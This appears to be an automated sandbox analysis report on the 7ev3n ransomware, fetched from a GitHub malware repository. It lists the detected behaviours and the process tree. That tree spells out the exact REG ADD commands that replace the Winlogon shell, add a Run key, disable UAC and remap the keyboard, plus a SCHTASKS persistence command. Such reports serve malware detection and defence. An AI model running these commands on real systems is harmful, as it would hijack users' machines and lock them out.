Resubmissions
15/05/2025, 12:20
250515-ph86xagj5w 1015/05/2025, 12:18
250515-pg217swxfs 815/05/2025, 12:17
250515-pf8glavqx2 10Analysis
-
max time kernel
49s -
max time network
51s -
platform
windows10-2004_x64 -
resource
win10v2004-20250502-en -
resource tags
arch:x64arch:x86image:win10v2004-20250502-enlocale:en-usos:windows10-2004-x64system -
submitted
15/05/2025, 12:17
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://github.com/Da2dalus/The-MALWARE-Repo
Resource
win10v2004-20250502-en
General
-
Target
https://github.com/Da2dalus/The-MALWARE-Repo
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Local\\system.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Local\\system.exe" reg.exe -
UAC bypass 3 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 157 3784 msedge.exe -
Executes dropped EXE 4 IoCs
pid Process 3500 7ev3n.exe 5824 7ev3n.exe 3120 system.exe 1016 system.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Admin\\AppData\\Local\\system.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Admin\\AppData\\Local\\system.exe" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 155 raw.githubusercontent.com 156 raw.githubusercontent.com 157 raw.githubusercontent.com -
System Location Discovery: System Language Discovery 1 TTPs 43 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shutdown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7ev3n.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7ev3n.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SCHTASKS.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language system.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SCHTASKS.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shutdown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language system.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133917850573289134" msedge.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-186956858-2143653872-2609589082-1000\{56EE996B-4B2C-4C1A-A76B-6DC8063771A6} msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3508 SCHTASKS.exe 5348 SCHTASKS.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
pid Process 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeShutdownPrivilege 828 shutdown.exe Token: SeRemoteShutdownPrivilege 828 shutdown.exe Token: SeShutdownPrivilege 5548 shutdown.exe Token: SeRemoteShutdownPrivilege 5548 shutdown.exe -
Suspicious use of FindShellTrayWindow 10 IoCs
pid Process 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4852 wrote to memory of 1768 4852 msedge.exe 87 PID 4852 wrote to memory of 1768 4852 msedge.exe 87 PID 4852 wrote to memory of 3784 4852 msedge.exe 88 PID 4852 wrote to memory of 3784 4852 msedge.exe 88 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3664 4852 msedge.exe 89 PID 4852 wrote to memory of 3944 4852 msedge.exe 90 PID 4852 wrote to memory of 3944 4852 msedge.exe 90 PID 4852 wrote to memory of 3944 4852 msedge.exe 90 PID 4852 wrote to memory of 3944 4852 msedge.exe 90 PID 4852 wrote to memory of 3944 4852 msedge.exe 90 PID 4852 wrote to memory of 3944 4852 msedge.exe 90 PID 4852 wrote to memory of 3944 4852 msedge.exe 90 PID 4852 wrote to memory of 3944 4852 msedge.exe 90 PID 4852 wrote to memory of 3944 4852 msedge.exe 90
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Da2dalus/The-MALWARE-Repo1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4852 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2c8,0x2cc,0x2d0,0x2c4,0x2d8,0x7ffd8017f208,0x7ffd8017f214,0x7ffd8017f2202⤵PID:1768
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1900,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=2332 /prefetch:32⤵
- Downloads MZ/PE file
PID:3784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2296,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=2292 /prefetch:22⤵PID:3664
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2396,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=2428 /prefetch:82⤵PID:3944
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3520,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=3564 /prefetch:12⤵PID:3436
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3532,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=3584 /prefetch:12⤵PID:2992
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4240,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=4260 /prefetch:12⤵PID:4916
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4296,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=4396 /prefetch:22⤵PID:3868
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3504,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=3668 /prefetch:82⤵PID:1736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3672,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=5328 /prefetch:82⤵PID:748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5096,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=5448 /prefetch:82⤵PID:1148
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5300,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=5132 /prefetch:82⤵PID:2464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5924,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=5264 /prefetch:82⤵PID:4132
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5924,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=5264 /prefetch:82⤵PID:4856
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6068,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=6104 /prefetch:82⤵PID:828
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6264,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=6284 /prefetch:82⤵PID:4780
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6348,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=6172 /prefetch:82⤵PID:3340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6184,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=6212 /prefetch:82⤵PID:4280
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6604,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=6616 /prefetch:82⤵PID:4288
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6648,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=6776 /prefetch:82⤵PID:2252
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6596,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=6936 /prefetch:82⤵PID:5096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6924,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=6804 /prefetch:82⤵PID:3120
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=704,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=4484 /prefetch:82⤵PID:3492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6080,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=4304 /prefetch:82⤵PID:5916
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5292,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=120 /prefetch:82⤵PID:5888
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --always-read-main-dll --field-trial-handle=6416,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=5112 /prefetch:12⤵PID:6108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7132,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=5536 /prefetch:82⤵PID:6100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6592,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=4304 /prefetch:82⤵PID:6084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6076,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=5208 /prefetch:82⤵PID:6048
-
-
C:\Users\Admin\Downloads\7ev3n.exe"C:\Users\Admin\Downloads\7ev3n.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3500 -
C:\Users\Admin\AppData\Local\system.exe"C:\Users\Admin\AppData\Local\system.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3120 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat4⤵
- System Location Discovery: System Language Discovery
PID:5472
-
-
C:\Windows\SysWOW64\SCHTASKS.exeC:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5348
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:644⤵
- System Location Discovery: System Language Discovery
PID:4380 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:645⤵
- Modifies WinLogon for persistence
- System Location Discovery: System Language Discovery
PID:5620
-
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:644⤵
- System Location Discovery: System Language Discovery
PID:5096 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:645⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:5660
-
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:644⤵
- System Location Discovery: System Language Discovery
PID:6016 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:645⤵
- System Location Discovery: System Language Discovery
PID:2184
-
-
-
